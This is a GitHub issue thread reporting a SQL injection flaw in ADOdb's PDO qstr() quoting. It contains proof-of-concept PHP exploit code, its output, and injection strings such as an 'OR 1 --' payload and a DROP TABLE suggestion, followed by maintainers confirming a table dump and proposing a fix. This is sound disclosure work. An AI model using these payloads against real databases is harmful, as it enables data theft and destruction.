### ISSUE TITLE
SECURITY: ADODB qstr does not quote properly with PDO

### ISSUE THREAD

**Issue by jdavidlists** [ADOdb/ADOdb#226]
In ADODB 5.20.4, using the PDO driver results in qstr not behaving properly, leading to SQL injection.  The same method called with the MySQLi driver works as expected.

Example code:

```
require_once( 'adodb5/adodb.inc.php' );

$db = ADONewConnection( 'pdo' );
$db->connect( $strDSN, $strUser, $strPassword );
echo "ADODB PDO: ", $db->qstr( 'backslash\\' ), "\n";
echo "ADODB PDO: ",$db->qstr( 'quote\'' ), "\n";


$pdo = new PDO( $strDSN, $strUser, $strPassword );
echo "PDO Native: ", $pdo->quote( 'backslash\\' ), "\n";
echo "PDO Native: ", $pdo->quote( 'quote\'' ), "\n";


$db = ADONewConnection( 'mysqli' );
$db->connect( $strHost, $strUser, $strPassword );
echo "ADODB MySQLi: ", $db->qstr( 'backslash\\' ), "\n";
echo "ADODB MySQLi: ", $db->qstr( 'quote\'' ), "\n";
```

Example results:

```
ADODB PDO: 'backslash\'
ADODB PDO: 'quote'''
PDO Native: 'backslash\\'
PDO Native: 'quote\''
ADODB MySQLi: 'backslash\\'
ADODB MySQLi: 'quote\''
```

Note the unescaped backslash and different style of single-quote escaping in the ADODB PDO example.

This is an exploitable vulnerability:

Exploit code:
```
$db = ADONewConnection( 'pdo' );
$db->connect( $strDSN, $strUser, $strPassword );
$strHack = 'backslash\\\',9*7 -- ';
$strSQL = "SELECT " . $db->qstr( $strHack );
echo $strSQL, "\n";
$x = $db->getAll( $strSQL );
var_dump( $x );
$x = $db->errorMsg();
var_dump( $x );
```

Exploit results:
```
SELECT 'backslash\'',9*7 -- '
array(1) {
  [0]=>
  array(4) {
    ["backslash'"]=>
    string(10) "backslash'"
    [0]=>
    string(10) "backslash'"
    ["9*7"]=>
    string(2) "63"
    [1]=>
    string(2) "63"
  }
}
string(0) ""
```

(Substitute ",9*7" for "; DROP TABLE AllYourAccountingRecords;")

**Comment by dregad** [comment]
Thanks for the report, will look into it

**Comment by mnewnham** [comment]
Whilst I agree that the example you give with 9*7 is correct, and can be duplicated, I cannot extrapolate it with any valid SQL like you suggested.  Here is the result of my test:
`````php
include '/dev/github/v5.20.4/adodb.inc.php';
$db = ADOnewConnection('pdo');
$db->debug = true;
$database = 'employees';
$host     = '127.0.0.1';
$user     = 'root';
$password = 'password';
$db->connect('mysql:host=localhost;dbname=employees;charset=utf8mb4',$user,$password);
//$strHack = 'backslash\\\',9*7 -- ';
$strHack = 'backslash\\\'; DROP TABLE nothing';
$strSQL = "SELECT " . $db->qstr( $strHack );
echo $strSQL, "\n";
$x = $db->getAll( $strSQL );
var_dump( $x );
````

And the result is:
````php
array(1) {
  [0]=>
  array(2) {
    ["backslash'"]=>
    string(10) "backslash'"
    [0]=>
    string(10) "backslash'"
  }
}
````

It would appear that the addition of the ; symbol causes execute() to discard the trailing statement. @jdavidlists Could you check the syntax of my sample to ensure I have created this test correctly

**Comment by jdavidlists** [comment]
You may have an easier time constructing an example in the predicate of the "OR 1" variety.  E.g.

```
SELECT * FROM SecretUserInfo WHERE Username='myfakename' OR 1
```

with something like:

```
$strHack = 'myfakename\\\' OR 1 --'
```

(Not tested; I'm on vacation.)

**Comment by dregad** [comment]
I confirm that, using @mnewnham's sample code above, I can dump the whole table
```
$strHack = 'xxxx\\\' OR 1 -- ';
$strSQL = "SELECT * FROM employees WHERE name = " . $db->qstr( $strHack );
```

That being said, the above query should really be written like this, which prevents any injection.
```
$strSQL = "SELECT * FROM employees WHERE name = ?"
$db->getAll($strSQL, array($strHack));
```

**Comment by dregad** [comment]
Proposed fix, see pull request #252 - override qstr() method in ADODB_pdo, that delegates quoting to underlying PDO object.

**Comment by dregad** [comment]
CVE assignment http://www.openwall.com/lists/oss-security/2016/09/15/1
